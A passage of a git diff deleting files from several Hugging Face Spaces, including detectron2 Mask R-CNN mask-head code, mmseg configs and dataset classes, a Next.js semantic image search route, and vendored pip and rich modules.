Registry("ROI_MASK_HEAD") -ROI_MASK_HEAD_REGISTRY.__doc__ = """ -Registry for mask heads, which predicts instance masks given -per-region features. - -The registered object will be called with `obj(cfg, input_shape)`. -""" - - -@torch.jit.unused -def mask_rcnn_loss(pred_mask_logits: torch.Tensor, instances: List[Instances], vis_period: int = 0): - """ - Compute the mask prediction loss defined in the Mask R-CNN paper. - - Args: - pred_mask_logits (Tensor): A tensor of shape (B, C, Hmask, Wmask) or (B, 1, Hmask, Wmask) - for class-specific or class-agnostic, where B is the total number of predicted masks - in all images, C is the number of foreground classes, and Hmask, Wmask are the height - and width of the mask predictions. The values are logits. - instances (list[Instances]): A list of N Instances, where N is the number of images - in the batch. These instances are in 1:1 - correspondence with the pred_mask_logits. The ground-truth labels (class, box, mask, - ...) associated with each instance are stored in fields. - vis_period (int): the period (in steps) to dump visualization. - - Returns: - mask_loss (Tensor): A scalar tensor containing the loss. - """ - cls_agnostic_mask = pred_mask_logits.size(1) == 1 - total_num_masks = pred_mask_logits.size(0) - mask_side_len = pred_mask_logits.size(2) - assert pred_mask_logits.size(2) == pred_mask_logits.size(3), "Mask prediction must be square!" - - gt_classes = [] - gt_masks = [] - for instances_per_image in instances: - if len(instances_per_image) == 0: - continue - if not cls_agnostic_mask: - gt_classes_per_image = instances_per_image.gt_classes.to(dtype=torch.int64) - gt_classes.append(gt_classes_per_image) - - gt_masks_per_image = instances_per_image.gt_masks.crop_and_resize( - instances_per_image.proposal_boxes.tensor, mask_side_len - ).to(device=pred_mask_logits.device) - # A tensor of shape (N, M, M), N=#instances in the image; M=mask_side_len - gt_masks.append(gt_masks_per_image) - - if len(gt_masks) == 0: - return pred_mask_logits.sum() * 0 - - gt_masks = cat(gt_masks, dim=0) - - if cls_agnostic_mask: - pred_mask_logits = pred_mask_logits[:, 0] - else: - indices = torch.arange(total_num_masks) - gt_classes = cat(gt_classes, dim=0) - pred_mask_logits = pred_mask_logits[indices, gt_classes] - - if gt_masks.dtype == torch.bool: - gt_masks_bool = gt_masks - else: - # Here we allow gt_masks to be float as well (depend on the implementation of rasterize()) - gt_masks_bool = gt_masks > 0.5 - gt_masks = gt_masks.to(dtype=torch.float32) - - # Log the training accuracy (using gt classes and 0.5 threshold) - mask_incorrect = (pred_mask_logits > 0.0) != gt_masks_bool - mask_accuracy = 1 - (mask_incorrect.sum().item() / max(mask_incorrect.numel(), 1.0)) - num_positive = gt_masks_bool.sum().item() - false_positive = (mask_incorrect & ~gt_masks_bool).sum().item() / max( - gt_masks_bool.numel() - num_positive, 1.0 - ) - false_negative = (mask_incorrect & gt_masks_bool).sum().item() / max(num_positive, 1.0) - - storage = get_event_storage() - storage.put_scalar("mask_rcnn/accuracy", mask_accuracy) - storage.put_scalar("mask_rcnn/false_positive", false_positive) - storage.put_scalar("mask_rcnn/false_negative", false_negative) - if vis_period > 0 and storage.iter % vis_period == 0: - pred_masks = pred_mask_logits.sigmoid() - vis_masks = torch.cat([pred_masks, gt_masks], axis=2) - name = "Left: mask prediction; Right: mask GT" - for idx, vis_mask in enumerate(vis_masks): - vis_mask = torch.stack([vis_mask] * 3, axis=0) - storage.put_image(name + f" ({idx})", vis_mask) - - mask_loss = F.binary_cross_entropy_with_logits(pred_mask_logits, gt_masks, reduction="mean") - return mask_loss - - -def mask_rcnn_inference(pred_mask_logits: torch.Tensor, pred_instances: List[Instances]): - """ - Convert pred_mask_logits to estimated foreground probability masks while also - extracting only the masks for the predicted classes in pred_instances. For each - predicted box, the mask of the same class is attached to the instance by adding a - new "pred_masks" field to pred_instances. - - Args: - pred_mask_logits (Tensor): A tensor of shape (B, C, Hmask, Wmask) or (B, 1, Hmask, Wmask) - for class-specific or class-agnostic, where B is the total number of predicted masks - in all images, C is the number of foreground classes, and Hmask, Wmask are the height - and width of the mask predictions. The values are logits. - pred_instances (list[Instances]): A list of N Instances, where N is the number of images - in the batch. Each Instances must have field "pred_classes". - - Returns: - None. pred_instances will contain an extra "pred_masks" field storing a mask of size (Hmask, - Wmask) for predicted class. Note that the masks are returned as a soft (non-quantized) - masks the resolution predicted by the network; post-processing steps, such as resizing - the predicted masks to the original image resolution and/or binarizing them, is left - to the caller. - """ - cls_agnostic_mask = pred_mask_logits.size(1) == 1 - - if cls_agnostic_mask: - mask_probs_pred = pred_mask_logits.sigmoid() - else: - # Select masks corresponding to the predicted classes - num_masks = pred_mask_logits.shape[0] - class_pred = cat([i.pred_classes for i in pred_instances]) - device = ( - class_pred.device - if torch.jit.is_scripting() - else ("cpu" if torch.jit.is_tracing() else class_pred.device) - ) - indices = move_device_like(torch.arange(num_masks, device=device), class_pred) - mask_probs_pred = pred_mask_logits[indices, class_pred][:, None].sigmoid() - # mask_probs_pred.shape: (B, 1, Hmask, Wmask) - - num_boxes_per_image = [len(i) for i in pred_instances] - mask_probs_pred = mask_probs_pred.split(num_boxes_per_image, dim=0) - - for prob, instances in zip(mask_probs_pred, pred_instances): - instances.pred_masks = prob # (1, Hmask, Wmask) - - -class BaseMaskRCNNHead(nn.Module): - """ - Implement the basic Mask R-CNN losses and inference logic described in :paper:`Mask R-CNN` - """ - - @configurable - def __init__(self, *, loss_weight: float = 1.0, vis_period: int = 0): - """ - NOTE: this interface is experimental. - - Args: - loss_weight (float): multiplier of the loss - vis_period (int): visualization period - """ - super().__init__() - self.vis_period = vis_period - self.loss_weight = loss_weight - - @classmethod - def from_config(cls, cfg, input_shape): - return {"vis_period": cfg.VIS_PERIOD} - - def forward(self, x, instances: List[Instances]): - """ - Args: - x: input region feature(s) provided by :class:`ROIHeads`. - instances (list[Instances]): contains the boxes & labels corresponding - to the input features. - Exact format is up to its caller to decide. - Typically, this is the foreground instances in training, with - "proposal_boxes" field and other gt annotations. - In inference, it contains boxes that are already predicted. - - Returns: - A dict of losses in training. The predicted "instances" in inference. - """ - x = self.layers(x) - if self.training: - return {"loss_mask": mask_rcnn_loss(x, instances, self.vis_period) * self.loss_weight} - else: - mask_rcnn_inference(x, instances) - return instances - - def layers(self, x): - """ - Neural network layers that makes predictions from input features. - """ - raise NotImplementedError - - -# To get torchscript support, we make the head a subclass of `nn.Sequential`. -# Therefore, to add new layers in this head class, please make sure they are -# added in the order they will be used in forward(). -@ROI_MASK_HEAD_REGISTRY.register() -class MaskRCNNConvUpsampleHead(BaseMaskRCNNHead, nn.Sequential): - """ - A mask head with several conv layers, plus an upsample layer (with `ConvTranspose2d`). - Predictions are made with a final 1x1 conv layer. - """ - - @configurable - def __init__(self, input_shape: ShapeSpec, *, num_classes, conv_dims, conv_norm="", **kwargs): - """ - NOTE: this interface is experimental. - - Args: - input_shape (ShapeSpec): shape of the input feature - num_classes (int): the number of foreground classes (i.e. background is not - included). 1 if using class agnostic prediction. - conv_dims (list[int]): a list of N>0 integers representing the output dimensions - of N-1 conv layers and the last upsample layer. - conv_norm (str or callable): normalization for the conv layers. - See :func:`detectron2.layers.get_norm` for supported types. - """ - super().__init__(**kwargs) - assert len(conv_dims) >= 1, "conv_dims have to be non-empty!" - - self.conv_norm_relus = [] - - cur_channels = input_shape.channels - for k, conv_dim in enumerate(conv_dims[:-1]): - conv = Conv2d( - cur_channels, - conv_dim, - kernel_size=3, - stride=1, - padding=1, - bias=not conv_norm, - norm=get_norm(conv_norm, conv_dim), - activation=nn.ReLU(), - ) - self.add_module("mask_fcn{}".format(k + 1), conv) - self.conv_norm_relus.append(conv) - cur_channels = conv_dim - - self.deconv = ConvTranspose2d( - cur_channels, conv_dims[-1], kernel_size=2, stride=2, padding=0 - ) - self.add_module("deconv_relu", nn.ReLU()) - cur_channels = conv_dims[-1] - - self.predictor = Conv2d(cur_channels, num_classes, kernel_size=1, stride=1, padding=0) - - for layer in self.conv_norm_relus + [self.deconv]: - weight_init.c2_msra_fill(layer) - # use normal distribution initialization for mask prediction layer - nn.init.normal_(self.predictor.weight, std=0.001) - if self.predictor.bias is not None: - nn.init.constant_(self.predictor.bias, 0) - - @classmethod - def from_config(cls, cfg, input_shape): - ret = super().from_config(cfg, input_shape) - conv_dim = cfg.MODEL.ROI_MASK_HEAD.CONV_DIM - num_conv = cfg.MODEL.ROI_MASK_HEAD.NUM_CONV - ret.update( - conv_dims=[conv_dim] * (num_conv + 1), # +1 for ConvTranspose - conv_norm=cfg.MODEL.ROI_MASK_HEAD.NORM, - input_shape=input_shape, - ) - if cfg.MODEL.ROI_MASK_HEAD.CLS_AGNOSTIC_MASK: - ret["num_classes"] = 1 - else: - ret["num_classes"] = cfg.MODEL.ROI_HEADS.NUM_CLASSES - return ret - - def layers(self, x): - for layer in self: - x = layer(x) - return x - - -def build_mask_head(cfg, input_shape): - """ - Build a mask head defined by `cfg.MODEL.ROI_MASK_HEAD.NAME`. - """ - name = cfg.MODEL.ROI_MASK_HEAD.NAME - return ROI_MASK_HEAD_REGISTRY.get(name)(cfg, input_shape) diff --git a/spaces/Superlang/ImageProcessor/annotator/uniformer/configs/_base_/schedules/schedule_20k.py b/spaces/Superlang/ImageProcessor/annotator/uniformer/configs/_base_/schedules/schedule_20k.py deleted file mode 100644 index bf780a1b6f6521833c6a5859675147824efa599d..0000000000000000000000000000000000000000 --- a/spaces/Superlang/ImageProcessor/annotator/uniformer/configs/_base_/schedules/schedule_20k.py +++ /dev/null @@ -1,9 +0,0 @@ -# optimizer -optimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0005) -optimizer_config = dict() -# learning policy -lr_config = dict(policy='poly', power=0.9, min_lr=1e-4, by_epoch=False) -# runtime settings -runner = dict(type='IterBasedRunner', max_iters=20000) -checkpoint_config = dict(by_epoch=False, interval=2000) -evaluation = dict(interval=2000, metric='mIoU') diff --git a/spaces/Superlang/ImageProcessor/annotator/uniformer/mmseg/datasets/chase_db1.py b/spaces/Superlang/ImageProcessor/annotator/uniformer/mmseg/datasets/chase_db1.py deleted file mode 100644 index 8bc29bea14704a4407f83474610cbc3bef32c708..0000000000000000000000000000000000000000 --- a/spaces/Superlang/ImageProcessor/annotator/uniformer/mmseg/datasets/chase_db1.py +++ /dev/null @@ -1,27 +0,0 @@ -import os.path as osp - -from .builder import DATASETS -from .custom import CustomDataset - - -@DATASETS.register_module() -class ChaseDB1Dataset(CustomDataset): - """Chase_db1 dataset. - - In segmentation map annotation for Chase_db1, 0 stands for background, - which is included in 2 categories. ``reduce_zero_label`` is fixed to False. - The ``img_suffix`` is fixed to '.png' and ``seg_map_suffix`` is fixed to - '_1stHO.png'. - """ - - CLASSES = ('background', 'vessel') - - PALETTE = [[120, 120, 120], [6, 230, 230]] - - def __init__(self, **kwargs): - super(ChaseDB1Dataset, self).__init__( - img_suffix='.png', - seg_map_suffix='_1stHO.png', - reduce_zero_label=False, - **kwargs) - assert osp.exists(self.img_dir) diff --git a/spaces/TNR-5/semantic-image-search.img/src/app/search/route.js b/spaces/TNR-5/semantic-image-search.img/src/app/search/route.js deleted file mode 100644 index 4961ecfd132d0e092c7eca985893e9da745bcbf4..0000000000000000000000000000000000000000 --- a/spaces/TNR-5/semantic-image-search.img/src/app/search/route.js +++ /dev/null @@ -1,73 +0,0 @@ -// Create a custom request handler for the /classify route. -// For more information, see https://nextjs.org/docs/app/building-your-application/routing/router-handlers - -import { NextResponse } from 'next/server' -import ApplicationSingleton from '../app.js' - -const parseInputs = (searchParams) => { - const text = searchParams.get('text'); - if (!text) { - return { - error: 'Missing text parameter', - }; - } - const threshold = searchParams.get('threshold'); - const match_threshold = Number(threshold ?? 0.1); - if (isNaN(match_threshold) || match_threshold < 0 || match_threshold > 1) { - return { - error: `Invalid threshold parameter "${threshold}" (should be a number between 0 and 1)`, - }; - } - - const limit = searchParams.get('limit'); - const match_count = Number(limit ?? 25); - if (isNaN(match_count) || !Number.isInteger(match_count) || match_count < 0 || match_count > 1000) { - return { - error: `Invalid limit parameter "${limit}" (should be an integer between 0 and 1000)`, - }; - } - - return { text, match_threshold, match_count } -} - -// TODO: add caching - -export async function GET(request) { - const parsedInputs = parseInputs(request.nextUrl.searchParams); - if (parsedInputs.error) { - return NextResponse.json({ - error: parsedInputs.error, - }, { status: 400 }); - } - - // Valid inputs, so we can proceed - const { text, match_threshold, match_count } = parsedInputs; - - // Get the tokenizer, model, and database singletons. When called for the first time, - // this will load the models and cache them for future use. - const [tokenizer, text_model, database] = await ApplicationSingleton.getInstance(); - - // Run tokenization - let text_inputs = tokenizer(text, { padding: true, truncation: true }); - - // Compute embeddings - const { text_embeds } = await text_model(text_inputs); - const query_embedding = text_embeds.tolist()[0]; - - // TODO add pagination? - let { data: images, error } = await database - .rpc('match_images', { - query_embedding, - match_threshold, - match_count, - }); - if (error) { - console.warn('Error fetching images', error); - return NextResponse.json({ - error: 'An error occurred while fetching images', - }, { status: 500 }); - } - - - return NextResponse.json(images); -} diff --git a/spaces/TandCAcceptMe/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_internal/index/__init__.py b/spaces/TandCAcceptMe/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_internal/index/__init__.py deleted file mode 100644 index 7a17b7b3b6ad49157ee41f3da304fec3d32342d3..0000000000000000000000000000000000000000 --- a/spaces/TandCAcceptMe/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_internal/index/__init__.py +++ /dev/null @@ -1,2 +0,0 @@ -"""Index interaction code -""" diff --git a/spaces/TandCAcceptMe/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_internal/index/collector.py b/spaces/TandCAcceptMe/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_internal/index/collector.py deleted file mode 100644 index b3e293ea3a508dc54674349e845f9794118f548b..0000000000000000000000000000000000000000 --- a/spaces/TandCAcceptMe/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_internal/index/collector.py +++ /dev/null @@ -1,505 +0,0 @@ -""" -The main purpose of this module is to expose LinkCollector.collect_sources(). -""" - -import collections -import email.message -import functools -import itertools -import json -import logging -import os -import urllib.parse -import urllib.request -from html.parser import HTMLParser -from optparse import Values -from typing import ( - TYPE_CHECKING, - Callable, - Dict, - Iterable, - List, - MutableMapping, - NamedTuple, - Optional, - Sequence, - Tuple, - Union, -) - -from pip._vendor import requests -from pip._vendor.requests import Response -from pip._vendor.requests.exceptions import RetryError, SSLError - -from pip._internal.exceptions import NetworkConnectionError -from pip._internal.models.link import Link -from pip._internal.models.search_scope import SearchScope -from pip._internal.network.session import PipSession -from pip._internal.network.utils import raise_for_status -from pip._internal.utils.filetypes import is_archive_file -from pip._internal.utils.misc import redact_auth_from_url -from pip._internal.vcs import vcs - -from .sources import CandidatesFromPage, LinkSource, build_source - -if TYPE_CHECKING: - from typing import Protocol -else: - Protocol = object - -logger = logging.getLogger(__name__) - -ResponseHeaders = MutableMapping[str, str] - - -def _match_vcs_scheme(url: str) -> Optional[str]: - """Look for VCS schemes in the URL. - - Returns the matched VCS scheme, or None if there's no match. - """ - for scheme in vcs.schemes: - if url.lower().startswith(scheme) and url[len(scheme)] in "+:": - return scheme - return None - - -class _NotAPIContent(Exception): - def __init__(self, content_type: str, request_desc: str) -> None: - super().__init__(content_type, request_desc) - self.content_type = content_type - self.request_desc = request_desc - - -def _ensure_api_header(response: Response) -> None: - """ - Check the Content-Type header to ensure the response contains a Simple - API Response. - - Raises `_NotAPIContent` if the content type is not a valid content-type. - """ - content_type = response.headers.get("Content-Type", "Unknown") - - content_type_l = content_type.lower() - if content_type_l.startswith( - ( - "text/html", - "application/vnd.pypi.simple.v1+html", - "application/vnd.pypi.simple.v1+json", - ) - ): - return - - raise _NotAPIContent(content_type, response.request.method) - - -class _NotHTTP(Exception): - pass - - -def _ensure_api_response(url: str, session: PipSession) -> None: - """ - Send a HEAD request to the URL, and ensure the response contains a simple - API Response. - - Raises `_NotHTTP` if the URL is not available for a HEAD request, or - `_NotAPIContent` if the content type is not a valid content type. - """ - scheme, netloc, path, query, fragment = urllib.parse.urlsplit(url) - if scheme not in {"http", "https"}: - raise _NotHTTP() - - resp = session.head(url, allow_redirects=True) - raise_for_status(resp) - - _ensure_api_header(resp) - - -def _get_simple_response(url: str, session: PipSession) -> Response: - """Access an Simple API response with GET, and return the response. - - This consists of three parts: - - 1. If the URL looks suspiciously like an archive, send a HEAD first to - check the Content-Type is HTML or Simple API, to avoid downloading a - large file. Raise `_NotHTTP` if the content type cannot be determined, or - `_NotAPIContent` if it is not HTML or a Simple API. - 2. Actually perform the request. Raise HTTP exceptions on network failures. - 3. Check the Content-Type header to make sure we got a Simple API response, - and raise `_NotAPIContent` otherwise. - """ - if is_archive_file(Link(url).filename): - _ensure_api_response(url, session=session) - - logger.debug("Getting page %s", redact_auth_from_url(url)) - - resp = session.get( - url, - headers={ - "Accept": ", ".join( - [ - "application/vnd.pypi.simple.v1+json", - "application/vnd.pypi.simple.v1+html; q=0.1", - "text/html; q=0.01", - ] - ), - # We don't want to blindly returned cached data for - # /simple/, because authors generally expecting that - # twine upload && pip install will function, but if - # they've done a pip install in the last ~10 minutes - # it won't. Thus by setting this to zero we will not - # blindly use any cached data, however the benefit of - # using max-age=0 instead of no-cache, is that we will - # still support conditional requests, so we will still - # minimize traffic sent in cases where the page hasn't - # changed at all, we will just always incur the round - # trip for the conditional GET now instead of only - # once per 10 minutes. - # For more information, please see pypa/pip#5670. - "Cache-Control": "max-age=0", - }, - ) - raise_for_status(resp) - - # The check for archives above only works if the url ends with - # something that looks like an archive. However that is not a - # requirement of an url. Unless we issue a HEAD request on every - # url we cannot know ahead of time for sure if something is a - # Simple API response or not. However we can check after we've - # downloaded it. - _ensure_api_header(resp) - - logger.debug( - "Fetched page %s as %s", - redact_auth_from_url(url), - resp.headers.get("Content-Type", "Unknown"), - ) - - return resp - - -def _get_encoding_from_headers(headers: ResponseHeaders) -> Optional[str]: - """Determine if we have any encoding information in our headers.""" - if headers and "Content-Type" in headers: - m = email.message.Message() - m["content-type"] = headers["Content-Type"] - charset = m.get_param("charset") - if charset: - return str(charset) - return None - - -class CacheablePageContent: - def __init__(self, page: "IndexContent") -> None: - assert page.cache_link_parsing - self.page = page - - def __eq__(self, other: object) -> bool: - return isinstance(other, type(self)) and self.page.url == other.page.url - - def __hash__(self) -> int: - return hash(self.page.url) - - -class ParseLinks(Protocol): - def __call__(self, page: "IndexContent") -> Iterable[Link]: - ... - - -def with_cached_index_content(fn: ParseLinks) -> ParseLinks: - """ - Given a function that parses an Iterable[Link] from an IndexContent, cache the - function's result (keyed by CacheablePageContent), unless the IndexContent - `page` has `page.cache_link_parsing == False`. - """ - - @functools.lru_cache(maxsize=None) - def wrapper(cacheable_page: CacheablePageContent) -> List[Link]: - return list(fn(cacheable_page.page)) - - @functools.wraps(fn) - def wrapper_wrapper(page: "IndexContent") -> List[Link]: - if page.cache_link_parsing: - return wrapper(CacheablePageContent(page)) - return list(fn(page)) - - return wrapper_wrapper - - -@with_cached_index_content -def parse_links(page: "IndexContent") -> Iterable[Link]: - """ - Parse a Simple API's Index Content, and yield its anchor elements as Link objects. - """ - - content_type_l = page.content_type.lower() - if content_type_l.startswith("application/vnd.pypi.simple.v1+json"): - data = json.loads(page.content) - for file in data.get("files", []): - link = Link.from_json(file, page.url) - if link is None: - continue - yield link - return - - parser = HTMLLinkParser(page.url) - encoding = page.encoding or "utf-8" - parser.feed(page.content.decode(encoding)) - - url = page.url - base_url = parser.base_url or url - for anchor in parser.anchors: - link = Link.from_element(anchor, page_url=url, base_url=base_url) - if link is None: - continue - yield link - - -class IndexContent: - """Represents one response (or page), along with its URL""" - - def __init__( - self, - content: bytes, - content_type: str, - encoding: Optional[str], - url: str, - cache_link_parsing: bool = True, - ) -> None: - """ - :param encoding: the encoding to decode the given content. - :param url: the URL from which the HTML was downloaded. - :param cache_link_parsing: whether links parsed from this page's url - should be cached. PyPI index urls should - have this set to False, for example. - """ - self.content = content - self.content_type = content_type - self.encoding = encoding - self.url = url - self.cache_link_parsing = cache_link_parsing - - def __str__(self) -> str: - return redact_auth_from_url(self.url) - - -class HTMLLinkParser(HTMLParser): - """ - HTMLParser that keeps the first base HREF and a list of all anchor - elements' attributes. - """ - - def __init__(self, url: str) -> None: - super().__init__(convert_charrefs=True) - - self.url: str = url - self.base_url: Optional[str] = None - self.anchors: List[Dict[str, Optional[str]]] = [] - - def handle_starttag(self, tag: str, attrs: List[Tuple[str, Optional[str]]]) -> None: - if tag == "base" and self.base_url is None: - href = self.get_href(attrs) - if href is not None: - self.base_url = href - elif tag == "a": - self.anchors.append(dict(attrs)) - - def get_href(self, attrs: List[Tuple[str, Optional[str]]]) -> Optional[str]: - for name, value in attrs: - if name == "href": - return value - return None - - -def _handle_get_simple_fail( - link: Link, - reason: Union[str, Exception], - meth: Optional[Callable[..., None]] = None, -) -> None: - if meth is None: - meth = logger.debug - meth("Could not fetch URL %s: %s - skipping", link, reason) - - -def _make_index_content( - response: Response, cache_link_parsing: bool = True -) -> IndexContent: - encoding = _get_encoding_from_headers(response.headers) - return IndexContent( - response.content, - response.headers["Content-Type"], - encoding=encoding, - url=response.url, - cache_link_parsing=cache_link_parsing, - ) - - -def _get_index_content(link: Link, *, session: PipSession) -> Optional["IndexContent"]: - url = link.url.split("#", 1)[0] - - # Check for VCS schemes that do not support lookup as web pages. - vcs_scheme = _match_vcs_scheme(url) - if vcs_scheme: - logger.warning( - "Cannot look at %s URL %s because it does not support lookup as web pages.", - vcs_scheme, - link, - ) - return None - - # Tack index.html onto file:// URLs that point to directories - scheme, _, path, _, _, _ = urllib.parse.urlparse(url) - if scheme == "file" and os.path.isdir(urllib.request.url2pathname(path)): - # add trailing slash if not present so urljoin doesn't trim - # final segment - if not url.endswith("/"): - url += "/" - # TODO: In the future, it would be nice if pip supported PEP 691 - # style responses in the file:// URLs, however there's no - # standard file extension for application/vnd.pypi.simple.v1+json - # so we'll need to come up with something on our own. - url = urllib.parse.urljoin(url, "index.html") - logger.debug(" file: URL is directory, getting %s", url) - - try: - resp = _get_simple_response(url, session=session) - except _NotHTTP: - logger.warning( - "Skipping page %s because it looks like an archive, and cannot " - "be checked by a HTTP HEAD request.", - link, - ) - except _NotAPIContent as exc: - logger.warning( - "Skipping page %s because the %s request got Content-Type: %s. " - "The only supported Content-Types are application/vnd.pypi.simple.v1+json, " - "application/vnd.pypi.simple.v1+html, and text/html", - link, - exc.request_desc, - exc.content_type, - ) - except NetworkConnectionError as exc: - _handle_get_simple_fail(link, exc) - except RetryError as exc: - _handle_get_simple_fail(link, exc) - except SSLError as exc: - reason = "There was a problem confirming the ssl certificate: " - reason += str(exc) - _handle_get_simple_fail(link, reason, meth=logger.info) - except requests.ConnectionError as exc: - _handle_get_simple_fail(link, f"connection error: {exc}") - except requests.Timeout: - _handle_get_simple_fail(link, "timed out") - else: - return _make_index_content(resp, cache_link_parsing=link.cache_link_parsing) - return None - - -class CollectedSources(NamedTuple): - find_links: Sequence[Optional[LinkSource]] - index_urls: Sequence[Optional[LinkSource]] - - -class LinkCollector: - - """ - Responsible for collecting Link objects from all configured locations, - making network requests as needed. - - The class's main method is its collect_sources() method. - """ - - def __init__( - self, - session: PipSession, - search_scope: SearchScope, - ) -> None: - self.search_scope = search_scope - self.session = session - - @classmethod - def create( - cls, - session: PipSession, - options: Values, - suppress_no_index: bool = False, - ) -> "LinkCollector": - """ - :param session: The Session to use to make requests. - :param suppress_no_index: Whether to ignore the --no-index option - when constructing the SearchScope object. - """ - index_urls = [options.index_url] + options.extra_index_urls - if options.no_index and not suppress_no_index: - logger.debug( - "Ignoring indexes: %s", - ",".join(redact_auth_from_url(url) for url in index_urls), - ) - index_urls = [] - - # Make sure find_links is a list before passing to create(). - find_links = options.find_links or [] - - search_scope = SearchScope.create( - find_links=find_links, - index_urls=index_urls, - no_index=options.no_index, - ) - link_collector = LinkCollector( - session=session, - search_scope=search_scope, - ) - return link_collector - - @property - def find_links(self) -> List[str]: - return self.search_scope.find_links - - def fetch_response(self, location: Link) -> Optional[IndexContent]: - """ - Fetch an HTML page containing package links. - """ - return _get_index_content(location, session=self.session) - - def collect_sources( - self, - project_name: str, - candidates_from_page: CandidatesFromPage, - ) -> CollectedSources: - # The OrderedDict calls deduplicate sources by URL. - index_url_sources = collections.OrderedDict( - build_source( - loc, - candidates_from_page=candidates_from_page, - page_validator=self.session.is_secure_origin, - expand_dir=False, - cache_link_parsing=False, - ) - for loc in self.search_scope.get_index_urls_locations(project_name) - ).values() - find_links_sources = collections.OrderedDict( - build_source( - loc, - candidates_from_page=candidates_from_page, - page_validator=self.session.is_secure_origin, - expand_dir=True, - cache_link_parsing=True, - ) - for loc in self.find_links - ).values() - - if logger.isEnabledFor(logging.DEBUG): - lines = [ - f"* {s.link}" - for s in itertools.chain(find_links_sources, index_url_sources) - if s is not None and s.link is not None - ] - lines = [ - f"{len(lines)} location(s) to search " - f"for versions of {project_name}:" - ] + lines - logger.debug("\n".join(lines)) - - return CollectedSources( - find_links=list(find_links_sources), - index_urls=list(index_url_sources), - ) diff --git a/spaces/TandCAcceptMe/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_vendor/rich/_inspect.py b/spaces/TandCAcceptMe/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_vendor/rich/_inspect.py deleted file mode 100644 index 30446ceb3f0235721e435f5fbd53f2e306f078cd..0000000000000000000000000000000000000000 --- a/spaces/TandCAcceptMe/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_vendor/rich/_inspect.py +++ /dev/null @@ -1,270 +0,0 @@ -from __future__ import absolute_import - -import inspect -from inspect import cleandoc, getdoc, getfile, isclass, ismodule, signature -from typing import Any, Collection, Iterable, Optional, Tuple, Type, Union - -from .console import Group, RenderableType -from .control import escape_control_codes -from .highlighter import ReprHighlighter -from .jupyter import JupyterMixin -from .panel import Panel -from .pretty import Pretty -from .table import Table -from .text import Text, TextType - - -def _first_paragraph(doc: str) -> str: - """Get the first paragraph from a docstring.""" - paragraph, _, _ = doc.partition("\n\n") - return paragraph - - -class Inspect(JupyterMixin): - """A renderable to inspect any Python Object. - - Args: - obj (Any): An object to inspect. - title (str, optional): Title to display over inspect result, or None use type. Defaults to None. - help (bool, optional): Show full help text rather than just first paragraph. Defaults to False. - methods (bool, optional): Enable inspection of callables. Defaults to False. - docs (bool, optional): Also render doc strings. Defaults to True. - private (bool, optional): Show private attributes (beginning with underscore). Defaults to False. - dunder (bool, optional): Show attributes starting with double underscore. Defaults to False. - sort (bool, optional): Sort attributes alphabetically. Defaults to True. - all (bool, optional): Show all attributes. Defaults to False. - value (bool, optional): Pretty print value of object. Defaults to True. - """ - - def __init__( - self, - obj: Any, - *, - title: Optional[TextType] = None, - help: bool = False, - methods: bool = False, - docs: bool = True, - private: bool = False, - dunder: bool = False, - sort: bool = True, - all: bool = True, - value: bool = True, - ) -> None: - self.highlighter = ReprHighlighter() - self.obj = obj - self.title = title or self._make_title(obj) - if all: - methods = private = dunder = True - self.help = help - self.methods = methods - self.docs = docs or help - self.private = private or dunder - self.dunder = dunder - self.sort = sort - self.value = value - - def _make_title(self, obj: Any) -> Text: - """Make a default title.""" - title_str = ( - str(obj) - if (isclass(obj) or callable(obj) or ismodule(obj)) - else str(type(obj)) - ) - title_text = self.highlighter(title_str) - return title_text - - def __rich__(self) -> Panel: - return Panel.fit( - Group(*self._render()), - title=self.title, - border_style="scope.border", - padding=(0, 1), - ) - - def _get_signature(self, name: str, obj: Any) -> Optional[Text]: - """Get a signature for a callable.""" - try: - _signature = str(signature(obj)) + ":" - except ValueError: - _signature = "(...)" - except TypeError: - return None - - source_filename: Optional[str] = None - try: - source_filename = getfile(obj) - except (OSError, TypeError): - # OSError is raised if obj has no source file, e.g. when defined in REPL. - pass - - callable_name = Text(name, style="inspect.callable") - if source_filename: - callable_name.stylize(f"link file://{source_filename}") - signature_text = self.highlighter(_signature) - - qualname = name or getattr(obj, "__qualname__", name) - - # If obj is a module, there may be classes (which are callable) to display - if inspect.isclass(obj): - prefix = "class" - elif inspect.iscoroutinefunction(obj): - prefix = "async def" - else: - prefix = "def" - - qual_signature = Text.assemble( - (f"{prefix} ", f"inspect.{prefix.replace(' ', '_')}"), - (qualname, "inspect.callable"), - signature_text, - ) - - return qual_signature - - def _render(self) -> Iterable[RenderableType]: - """Render object.""" - - def sort_items(item: Tuple[str, Any]) -> Tuple[bool, str]: - key, (_error, value) = item - return (callable(value), key.strip("_").lower()) - - def safe_getattr(attr_name: str) -> Tuple[Any, Any]: - """Get attribute or any exception.""" - try: - return (None, getattr(obj, attr_name)) - except Exception as error: - return (error, None) - - obj = self.obj - keys = dir(obj) - total_items = len(keys) - if not self.dunder: - keys = [key for key in keys if not key.startswith("__")] - if not self.private: - keys = [key for key in keys if not key.startswith("_")] - not_shown_count = total_items - len(keys) - items = [(key, safe_getattr(key)) for key in keys] - if self.sort: - items.sort(key=sort_items) - - items_table = Table.grid(padding=(0, 1), expand=False) - items_table.add_column(justify="right") - add_row = items_table.add_row - highlighter = self.highlighter - - if callable(obj): - signature = self._get_signature("", obj) - if signature is not None: - yield signature - yield "" - - if self.docs: - _doc = self._get_formatted_doc(obj) - if _doc is not None: - doc_text = Text(_doc, style="inspect.help") - doc_text = highlighter(doc_text) - yield doc_text - yield "" - - if self.value and not (isclass(obj) or callable(obj) or ismodule(obj)): - yield Panel( - Pretty(obj, indent_guides=True, max_length=10, max_string=60), - border_style="inspect.value.border", - ) - yield "" - - for key, (error, value) in items: - key_text = Text.assemble( - ( - key, - "inspect.attr.dunder" if key.startswith("__") else "inspect.attr", - ), - (" =", "inspect.equals"), - ) - if error is not None: - warning = key_text.copy() - warning.stylize("inspect.error") - add_row(warning, highlighter(repr(error))) - continue - - if callable(value): - if not self.methods: - continue - - _signature_text = self._get_signature(key, value) - if _signature_text is None: - add_row(key_text, Pretty(value, highlighter=highlighter)) - else: - 